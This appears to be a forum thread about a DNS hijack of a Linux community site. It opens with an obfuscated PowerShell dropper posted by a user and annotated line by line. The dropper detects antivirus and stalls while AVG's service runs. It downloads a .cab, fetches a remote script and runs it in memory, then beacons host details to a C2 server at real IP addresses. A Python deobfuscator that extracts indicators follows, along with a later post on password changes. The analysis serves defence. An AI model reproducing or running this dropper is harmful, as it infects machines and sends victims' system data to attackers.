$avs = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,68,105,115,112,108,97,121,78,97,109,101,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116) -join ''));
foreach ($av1 in $avs) { $av += $av1.displayName + ","};
if($av -like "*avg*"){
9,66,107,65,72,81,65,86,81,65,120,65,72,73,65,99,119,66,71,65,72,111,65,85,81,65,118,65,72,111,65,86,81,66,77,65,71,111,65,76,119,66,81,65,70,65,65,82,119,66,108,65,70,103,65,98,103,66,52,65,69,48,65,75,119,66,114,65,72,103,65,86,81,66,109,65,68,69,65,98,103,66,118,65,72,81,65,82,81,65,52,65,68,77,65,97,65,66,121,65,71,52,65,78,81,66,80,65,70,103,65,99,103,66,89,65,71,52,65,77,103,65,49,65,69,56,65,79,81,66,111,65,72,89,65,97,103,66,75,65,69,48,65,87,65,65,121,65,70,81,65,83,119,66,75,65,70,103,65,97,65,66,72,65,71,81,65,101,103,66,121,65,71,69,65,98,119,66,48,65,71,107,65,86,119,66,48,65,68,103,65,75,119,66,81,65,71,81,65,86,119,66,52,65,70,65,65,98,103,65,49,65,72,73,65,100,65,65,49,65,70,99,65,97,65,66,90,65,67,56,65,99,81,66,75,65,69,81,65,87,103,66,68,65,71,77,65,86,103,66,107,65,71,48,65,87,65,66,86,65,70,65,65,85,119,66,117,65,68,69,65,83,103,66,115,65,68,103,65,98,81,66,111,65,72,99,65,99,119,66,81,65,71,89,65,77,65,65,51,65,67,115,65,79,65,66,97,65,69,119,65,90,103,66,78,65,68,65,65,98,81,66,82,65,72,81,65,77,81,65,118,65,68,89,65,75,119,66,50,65,71,103,65,87,81,65,49,65,67,56,65,82,65,66,83,65,71,85,65,82,119,66,73,65,72,89,65,76,119,66,48,65,69,103,65,84,65,65,48,65,69,119,65,78,103,66,75,65,72,107,65,83,103,66,119,65,70,99,65,78,81,66,69,65,68,103,65,100,65,65,48,65,70,107,65,86,119,66,78,65,72,69,65,84,65,65,49,65,71,111,65,79,65,66,50,65,68,81,65,83,103,66,68,65,68,107,65,98,119,66,48,65,68,85,65,86,103,66,119,65,69,73,65,90,119,66,104,65,70,65,65,83,103,66,106,65,70,77,65,83,81,66,114,65,72,77,65,81,103,66,52,65,69,89,65,76,119,66,85,65,71,89,65,78,81,65,50,65,72,73,65,101,65,65,52,65,71,73,65,99,119,65,122,65,69,99,65,99,81,66,109,65,70,73,65,84,119,66,116,65,72,107,65,85,119,66,75,65,68,77,65,84,65,66,122,65,71,52,65,101,81,65,121,65,69,115,65,97,103,66,49,65,67,56,65,77,103,66,119,65,71,52,65,78,81,66,105,65,69,52,65,101,103,66,104,65,69,52,65,78,119,66,66,65,68,85,65,84,81,66,88,65,72,103,65,87,65,66,105,65,68,103,65,81,81,66,117,65,69,81,65,98,10
3,66,109,65,71,85,65,77,103,66,104,65,71,81,65,78,119,66,122,65,72,103,65,85,103,65,114,65,68,69,65,75,119,66,52,65,72,69,65,101,103,65,119,65,70,81,65,89,103,66,121,65,70,65,65,89,119,66,73,65,69,111,65,87,65,65,51,65,68,103,65,90,103,66,115,65,71,89,65,74,119,65,112,65,67,119,65,87,119,66,74,65,69,56,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,84,81,66,118,65,71,81,65,90,81,66,100,65,68,111,65,79,103,66,69,65,71,85,65,89,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,67,107,65,75,81,65,115,65,70,115,65,86,65,66,108,65,72,103,65,100,65,65,117,65,69,85,65,98,103,66,106,65,71,56,65,90,65,66,112,65,71,52,65,90,119,66,100,65,68,111,65,79,103,66,66,65,70,77,65,81,119,66,74,65,69,107,65,75,81,65,112,65,67,52,65,85,103,66,108,65,71,69,65,90,65,66,85,65,71,56,65,82,81,66,117,65,71,81,65,75,65,65,112,65,65,61,61) -join '') -wait;
# Decoded: 'avgwd' (AVG's watchdog service) and 'Running'. The dropper idles in
# 10-second steps for as long as that AV service is running.
while((get-service -Name ([char[]](97,118,103,119,100) -join '')).Status -eq ([char[]](82,117,110,110,105,110,103) -join '')) {Start-Sleep -Seconds 10;}
}
# Decoded path: HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP. Picks the highest
# installed .NET Framework version; it is reported to the C2 below as "ps.:".
$ps = (Get-ChildItem ([char[]](72,75,76,77,58,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,78,69,84,32,70,114,97,109,101,119,111,114,107,32,83,101,116,117,112,92,78,68,80) -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version -Descending)[0].Version;
# Decoded: 'WinRAR' and '.:Winrar'. Flags whether a WinRAR folder exists under $dir.
if(Test-Path $(Join-Path $dir ([char[]](87,105,110,82,65,82) -join ''))){
$wr = ([char[]](46,58,87,105,110,114,97,114) -join '')
}
# Optional stage: pull a .cab from the download host into
# %APPDATA%\Microsoft\Windows\Templates\ (decoded path) and spawn a hidden
# PowerShell with an encoded (-E) command line.
if($v1) {
$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
$ll = "COF267F9415EF3518C.cab"
$output = "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '')" + $ll;
(New-Object System.Net.WebClient).DownloadFile($durl, $output);
Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 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
";
}
# Second stage: fetch a script from the same host and run it straight from memory
# with iex (download-and-execute, nothing written to disk).
$durl = "http://130.211.157.13/artw/arquivo"
Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
# Fingerprint via WMI (decoded: root\CIMV2, SELECT * FROM Win32_OperatingSystem), then
# beacon hostname, OS caption, service pack, architecture, .NET version, the WinRAR
# flag, $V1 and the detected AV ($av) to the C2 in the query string.
$tudo = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,67,73,77,86,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,42,32,70,82,79,77,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109) -join ''));
$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
}
}
# Release the mutex acquired earlier in the script.
$mtx.ReleaseMutex()
$mtx.Dispose()
}
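The posted dropper hides every sensitive string as a `[char[]](...) -join ''` list of code points. The decoder below is an added example (it is not the poster's code and not part of the malware): it rewrites those arrays into plain literals and pulls out the decoded strings and the URLs, using lines copied from the script above as constructed sample input, so it runs offline.

```python
import re

# Regex for the obfuscation idiom used throughout the posted dropper:
#   ([char[]](97,118,103,119,100) -join '')
# Group 1 captures the comma-separated code points.
CHAR_ARRAY = re.compile(
    r"\[char\[\]\]\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)\s*-join\s*''"
)

# Anything that looks like an http(s) URL inside a PowerShell string.
URL = re.compile(r"https?://[^\s'\"]+")


def decode_char_array(numbers):
    """Turn '72,75,76,77' into 'HKLM' (each number is a UTF-16 code unit)."""
    return "".join(chr(int(n)) for n in numbers.split(","))


def deobfuscate(script):
    """Rewrite every [char[]](...) -join '' into a single-quoted literal.

    The parentheses the dropper wraps around the idiom are left in place,
    so the result is still valid PowerShell, just readable.
    """
    def to_literal(match):
        text = decode_char_array(match.group(1))
        return "'" + text.replace("'", "''") + "'"  # PowerShell escapes ' as ''
    return CHAR_ARRAY.sub(to_literal, script)


def extract_strings(script):
    """All decoded char-array strings, in order of appearance."""
    return [decode_char_array(m.group(1)) for m in CHAR_ARRAY.finditer(script)]


def extract_urls(script):
    """Network indicators (download and beacon URLs), in order of appearance."""
    return URL.findall(script)


# Constructed input: lines copied verbatim from the dropper posted in this thread.
SAMPLE = r"""
while((get-service -Name ([char[]](97,118,103,119,100) -join '')).Status -eq ([char[]](82,117,110,110,105,110,103) -join '')) {Start-Sleep -Seconds 10;}
$ps = (Get-ChildItem ([char[]](72,75,76,77,58,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,78,69,84,32,70,114,97,109,101,119,111,114,107,32,83,101,116,117,112,92,78,68,80) -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version -Descending)[0].Version;
if(Test-Path $(Join-Path $dir ([char[]](87,105,110,82,65,82) -join ''))){
$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
$output = "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '')" + $ll;
$durl = "http://130.211.157.13/artw/arquivo"
$tudo = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,67,73,77,86,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,42,32,70,82,79,77,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109) -join ''));
$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName).getResponse();
"""


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print("strings:", extract_strings(SAMPLE))
    print("urls:", extract_urls(SAMPLE))
```

Running it shows the script waiting on the 'avgwd' service, reading the .NET version under HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP, checking for WinRAR, querying Win32_OperatingSystem through WMI, and the download host (130.211.157.13) plus the beacon endpoint (31.220.57.180/frontile/LIMITED/LetsGo.php); those hosts and the `LetsGo.php?A=A&Sytem=` query are the indicators to hunt for in proxy and DNS logs.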




72. Re: VOL suffered a DNS hijack and was pointed at a FAKE site

Gabriel Henrique da Silva Ferreira
MrBlackWolf

(uses Arch Linux)

Posted on 25/11/2016 - 10:35h

fernandojsouza wrote:

Being compared to Richard Matthew Stallman is an honor ...


I say again: we don't know the real extent of the site's compromise, whether the action went further (database), so I suggest everyone change the passwords of their e-mail and of their login here on the site.

Only time will tell!!!


Yesterday the site's source code was altered; today, so far, I haven't seen that alteration any more. I have a screenshot with the altered code.

The cache was cleared and I even deleted the .mozilla folder, and even so the problem continued until 23/11/2016.

I saw Fábio's comment about the Gmail account used as the login at registro.br.


I'm basing myself on the principles of COBIT and also on our friend Stallman.


No offense was intended, don't get me wrong, but Stallman doesn't even use browsers these days. Nowadays he downloads sites using tools like wget.